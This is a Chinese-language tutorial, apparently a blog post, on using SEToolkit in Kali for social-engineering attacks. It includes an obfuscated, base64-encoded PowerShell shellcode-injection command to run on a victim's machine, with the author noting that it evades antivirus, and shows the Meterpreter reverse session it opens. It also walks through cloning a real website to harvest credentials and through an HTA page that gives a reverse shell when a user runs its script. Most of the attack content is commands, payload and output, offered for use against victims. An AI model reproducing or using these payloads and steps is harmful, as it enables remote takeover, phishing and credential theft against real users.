社會工程學(Social Engineering)簡稱社工,其經過分析攻擊對象的心理弱點,利用人性的本能反應,以及任何好奇心,貪婪等心理特徵進行的,使用諸如假冒,欺騙,引誘等多種手段來達成攻擊目標的一種手段,社會工程學的應用領域很是之普遍,而不少黑客也會將社工運用到滲透的方方面面,社工也被稱爲沒有技術,卻比技術更強大的滲透方式,正所謂 「攻城爲下,攻心爲上」 這句話用在社工上面是最恰當不過的啦。html
接下來將介紹一個工具,社會工程工具包(SEToolkit)工具,該工具由 David Kennedy (ReL1K)設計並開發,而且有一羣活躍的社區合做進行維護工做(www.social-engineer.org),該工具包是開源的並使用Python做爲開發語言,其主要目的是協助黑客更好的進行社工活動。nginx
PowerShell 注入攻擊
社工工具包中包含一個PowerShell注入攻擊的有效載荷,適用於 Win7 - Win10系統使用,由於PowerShell腳本能夠很容易的將ShellCode注入到目標的物理內存中,使用該載荷攻擊不會觸發病毒報警。web
1.Kali系統中默認安裝了SEToolkit工具,咱們只須要運行該工具,而後從主菜單選擇 1) Social-Engineering。shell
root@kali:~# setoolkit Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1
2.而後在選擇下一級菜單中的 9) PowerShell Attack Vectors。apache
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. set> 9
3.接着咱們選擇第一個選項,Powershell Alphanumeric Shellcode Injectorwindows
1) Powershell Alphanumeric Shellcode Injector 2) Powershell Reverse Shell 3) Powershell Bind Shell 4) Powershell Dump SAM Database 99) Return to Main Menu set:powershell> 1
4.首先設置好本機的IP地址,我這裏是 192.168.1.40 而後等待生成PowerShell腳本,默認放在 /root/.set/reports/powershell/路徑下,咱們複製裏面的內容。session
Enter the IPAddress or DNS name for the reverse host: 192.168.1.40 set:powershell> Enter the port for the reverse [443]: [*] Prepping the payload for delivery and injecting alphanumeric shellcode... [*] Generating x86-based powershell injection code... [*] Reverse_HTTPS takes a few seconds to calculate..One moment.. No encoder or badchars specified, outputting raw payload Payload size: 380 bytes Final size of c file: 1622 bytes [*] Finished generating powershell injection bypass. [*] Encoded to bypass execution restriction policy... [*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/ set> Do you want to start the listener now [yes/no]: : yes
5.經過各類途徑,在被害主機上面執行這一段ShellCode代碼。less
powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"
6.回到Kali,會發現出現了一個會話,使用 sessions -i 查詢,上線成功!工具
msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443 [*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ... [*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800 msf5 exploit(multi/handler) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows DESKTOP @ DESKTOP 192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2) msf5 exploit(multi/handler) >
SEToolkit 站點克隆
- SEToolkit 還支持站點克隆首先選擇,1)Social-Engineering Attacks
Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1
2.接着選擇,2)Website Attack Vectorsui
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. set> 2
- 選擇 3)Credential Harvester Attack Method
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method 99) Return to Main Menu set:webattack>3
4.這裏會有三個選項,第一個是使用系統自帶的模板,第二個是克隆一個頁面,第三個是自定義頁面,此處選擇2,並輸入待克隆頁面。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
SEToolkit HTA 注入攻擊
HTA shell注入攻擊,生成一個克隆頁面,當用戶點擊運行腳本的時候,會觸發反彈一個Shell。
1.根據上方的步驟,從新運行SEToolkit工具而後選擇,1)Social-Engineering Attacks
Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1
2.選擇 2)Website Attack Vectors
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. set> 2
3.選擇 8)HTA Attack Method
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method 99) Return to Main Menu set:webattack>8
4.選擇 2)Site Cloner,克隆一個站點,而後選擇一個攻擊載荷,Meterpreter Reverse TCP
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:www.baidu.com [*] HTA Attack Vector selected. Enter your IP, Port, and Payload... set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]: Enter the port for the reverse payload [443]: Select the payload you want to deliver: 1. Meterpreter Reverse HTTPS 2. Meterpreter Reverse HTTP 3. Meterpreter Reverse TCP Enter the payload number [1-3]: 3
5.用戶點擊頁面,運行腳本之後,成功反彈Shell。
